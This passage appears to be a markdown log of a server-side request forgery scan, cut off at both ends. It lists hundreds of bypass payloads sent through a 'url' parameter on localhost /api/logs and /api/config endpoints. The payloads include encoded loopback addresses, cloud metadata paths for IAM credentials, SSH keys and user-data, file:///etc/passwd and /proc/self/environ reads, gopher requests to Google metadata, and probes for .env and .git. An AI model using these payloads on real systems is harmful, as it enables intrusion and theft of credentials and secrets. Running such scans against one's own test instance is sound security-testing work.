`http://localhost:4200/api/logs?url=7F000001` +- Testing: `http://localhost:4200/api/logs?url=2130706433` +- Testing: `http://localhost:4200/api/logs?url=6425673729` +- Testing: `http://localhost:4200/api/logs?url=127001` +- Testing: `http://localhost:4200/api/logs?url=127_0._0_1` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/logs?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/logs?url=localtest.me` +- Testing: `http://localhost:4200/api/logs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/logs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/logs?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/logs?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001` +- Testing: `http://localhost:4200/api/logs?url=017700000001` +- Testing: `http://localhost:4200/api/logs?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/logs?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/logs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/logs?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/logs?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254` +- Testing: `http://localhost:4200/api/logs?url=2852039166` +- Testing: `http://localhost:4200/api/logs?url=7147006462` +- Testing: `http://localhost:4200/api/logs?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/logs?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/logs?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/logs?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/logs?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/logs?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/logs?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/logs?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/logs?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/logs?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/logs?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/logs?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/logs?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/logs?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235521` +- Testing: `http://localhost:4200/api/logs?url=3232235777` +- Testing: `http://localhost:4200/api/logs?url=425.510.425.510` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/logs?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/logs?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/logs?url=instance-data` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A22` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A443` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/logs?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/logs?url=loopback` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A22` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A80` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A443` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/logs?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/logs?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/logs?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/logs?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/logs?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/logs?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/logs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/logs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/logs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/logs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/logs?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/logs?url=0%2F` +- Testing: `http://localhost:4200/api/logs?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/config +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/config?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/config?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/config?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/config?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/config?url=127.1%3A80` +- Testing: `http://localhost:4200/api/config?url=0` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/config?url=localhost%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/config?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/config?url=127.127.127.127` +- Testing: `http://localhost:4200/api/config?url=127.0.1.3` +- Testing: `http://localhost:4200/api/config?url=127.0.0.0` +- Testing: `http://localhost:4200/api/config?url=2130706433` +- Testing: `http://localhost:4200/api/config?url=017700000001` +- Testing: `http://localhost:4200/api/config?url=0x7f000001` +- Testing: `http://localhost:4200/api/config?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/config?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/config?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/config?url=google.com.localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=localtest.me` +- Testing: `http://localhost:4200/api/config?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/config?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/config?url=2130706433%2F` +- Testing: `http://localhost:4200/api/config?url=3232235521%2F` +- Testing: `http://localhost:4200/api/config?url=3232235777%2F` +- Testing: `http://localhost:4200/api/config?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/config?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/config?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/config?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/config?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/config?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/config?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/config?url=0%2F` +- Testing: `http://localhost:4200/api/config?url=127.1` +- Testing: `http://localhost:4200/api/config?url=127.0.1` +- Testing: `http://localhost:4200/api/config?url=localtest.me` +- Testing: `http://localhost:4200/api/config?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/config?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/config?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/config?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/config?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.1.3` +- Testing: `http://localhost:4200/api/config?url=0` +- Testing: `http://localhost:4200/api/config?url=127.1` +- Testing: `http://localhost:4200/api/config?url=127.0.1` +- Testing: `http://localhost:4200/api/config?url=localhost` +- Testing: `http://localhost:4200/api/config?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/config?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/config?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/config?url=7F000001` +- Testing: `http://localhost:4200/api/config?url=2130706433` +- Testing: `http://localhost:4200/api/config?url=6425673729` +- Testing: `http://localhost:4200/api/config?url=127001` +- Testing: `http://localhost:4200/api/config?url=127_0._0_1` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A80` +- Testing: 